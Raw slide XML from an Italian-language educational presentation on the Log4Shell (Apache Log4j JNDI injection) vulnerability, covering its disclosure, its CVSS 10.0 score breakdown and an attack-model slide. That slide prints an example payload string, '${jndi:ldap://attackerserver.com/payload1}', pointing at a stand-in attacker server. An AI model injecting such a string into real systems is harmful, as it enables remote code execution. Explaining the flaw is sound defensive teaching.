        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2237247203"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894400" y="53975"/>
            <a:ext cx="33552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Log4Shell</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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3" name="Sottotitolo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B50CFE0A-6628-3889-1FCC-286B3CF445AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="1126938"/>
            <a:ext cx="7310681" cy="3381451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Vulnerabilità di iniezione di Java Naming and Directory Interface™ (JNDI) che può consentire l'esecuzione di codice remoto (RCE) includendo dati non attendibili (come payload dannosi) nel messaggio loggato in una versione vulnerabile di Apache Log4j.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Segnalata pubblicamente il 9 dicembre 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Definita come la vulnerabilità più critica degli ultimi 10 anni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Effettuati oltre 1.272.000 tentativi di hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Permette l’accesso completo al sistema da qualsiasi parte del mondo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2298290531"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682691" y="119270"/>
            <a:ext cx="3778618" cy="636430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>CVSS v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> Score</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845331" y="971385"/>
            <a:ext cx="7806624" cy="934237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Secondo il sistema di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> scoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CVSS 3.1 Log4Shell ha ottenuto uno score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>di base di 10.0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>il massimo possibile. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">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215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8822B5B9-A095-866B-BF9E-56E165E13E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2226365" y="1778945"/>
            <a:ext cx="4412974" cy="3063399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3256291244"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682691" y="119270"/>
            <a:ext cx="3778618" cy="636430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>CVSS v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> Score</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80F7CB8-33C7-4BC8-274F-86690660EA81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5045155" y="883752"/>
            <a:ext cx="3606800" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;214;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96C2CBA-FE91-2D29-F835-95F66257C6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828949" y="892995"/>
            <a:ext cx="4153191" cy="3416611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In particolare secondo i parametri dello Base Score i punteggi assegnati a Log4Shell hanno evidenziato come:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>L’attacco Log4Shell è semplice da condurre e non necessita di particolari conoscenze</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Non si necessita di nessun tipo di privilegi per poter effettuare l’attacco</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>È una vulnerabilità sfruttabile senza l’interazione di un utente terzo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Questa vulnerabilità ha un forte impatto sui valori della triade CIA (Confidenzialità, Integrità, Disponibilità)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2"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921747865"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352395" y="181025"/>
            <a:ext cx="4624684"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err="1"/>
              <a:t>Modello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>d’attacco</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="1154661"/>
            <a:ext cx="7154278" cy="3405682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Log4J dovrebbe mostrare e gestire solo stringhe di testo, ma quando si trova davanti ad un messaggio formattato in un certo modo lo interpreta come un indirizzo internet lo raggiunge sfruttando la JNDI (Java Naming and Directory Interface), scarica il payload e lo esegue con i privilegi del programma principale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Una stringa del tipo :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>attackerserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/payload1}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Se passata a Log4j come messaggio avvia la connessione tra il server vulnerabile e il server dell’attaccante che restituirà una classe java con codice malevolo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">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215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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extLst>
